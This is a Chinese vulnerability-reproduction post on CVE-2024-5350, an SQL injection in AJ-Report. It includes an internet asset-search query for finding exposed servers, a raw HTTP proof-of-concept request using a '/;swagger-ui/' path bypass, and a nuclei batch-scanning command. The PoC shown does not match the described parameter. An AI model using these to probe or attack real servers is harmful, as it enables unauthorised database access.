漏洞复现-CVE-2024-5350

一:漏洞名称

AJ-Report pageList sql注入漏洞

二:漏洞描述

AJ-Report 1.4.1 是一个灵活的开源工具,可轻松生成各种动态报表,并支持多种数据源。它易于集成到 Java Web 应用程序中,提供了丰富的定制选项,适用于开发人员快速创建和展示报表。

AJ-Report up to 1.4.1的漏洞已被发现,被分类为关键。受影响的是/pageList文件中的pageList函数。对参数p的操纵会导致sql注入。攻击可以远程发起。漏洞已被披露给公众,并可能被利用。

三:漏洞影响版本


AJ-Report up to 1.4.1

四:网络空间测绘查询


title="AJ-Report"
漏洞复现-CVE-2024-5350
漏洞复现-CVE-2024-5350

五:漏洞复现

poc
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip
漏洞复现-CVE-2024-5350

SQL注入(SQL Injection)是一种常见的安全漏洞,它允许攻击者利用应用程序中存在的漏洞,向数据库中执行恶意的SQL查询。其原理主要涉及到应用程序对用户输入的处理不当,使得恶意用户可以在输入中插入SQL代码,从而实现对数据库的非法操作。

六:批量检测


nuclei.exe -t CVE-2024-5350.yaml -l host.txt

七:修复建议


建议更新当前系统或软件至最新版,完成漏洞的修复。
22c170167d20240605032318.zip
zip文件
2.3K
© 版权声明
THE END
喜欢就支持一下吧
点赞7 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容